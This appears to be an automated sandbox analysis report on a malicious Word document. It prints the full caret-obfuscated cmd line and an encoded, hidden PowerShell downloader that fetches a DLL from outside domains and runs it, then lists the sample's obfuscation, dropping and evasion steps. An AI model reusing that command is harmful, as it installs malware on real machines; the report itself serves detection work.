Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00180A90 push edx; ret 7_2_00180C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00169A06 push esi; iretd 7_2_00169A0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001700C8 push es; retn 0000h 7_2_001700CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00452D98 push 00452E25h; ret 7_2_00452E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460020 push 00460058h; ret 7_2_00460050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00454038 push 00454064h; ret 7_2_0045405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B2 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B4 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042B274 push 0042B2CDh; ret 7_2_0042B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C34C push 0043C378h; ret 7_2_0043C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx 7_2_0042E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004604F4 push 0046055Ch; ret 7_2_00460554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460498 push 004604EFh; ret 7_2_004604E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605F0 push 0046063Ch; ret 7_2_00460634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460580 push 004605ACh; ret 7_2_004605A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B588 push 0045B5CAh; ret 7_2_0045B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605B8 push 004605E4h; ret 7_2_004605DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460654 push 00460680h; ret 7_2_00460678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004606C4 push 004606F0h; ret 7_2_004606E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D6DC push 0042D751h; ret 7_2_0042D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx 7_2_0042E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046068C push 004606B8h; ret 7_2_004606B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx 7_2_0042E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428748 push 00428774h; ret 7_2_0042876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx 7_2_0042E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D754 push 0042D7ADh; ret 7_2_0042D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004607E4 push 00460827h; ret 7_2_0046081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428798 push 004287C4h; ret 7_2_004287BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004637A8 push 004637E0h; ret 7_2_004637D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00463848 push 00463874h; ret 7_2_0046386C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046086C push 00460898h; ret 7_2_00460890

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Unxqf\ouoi.jab:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
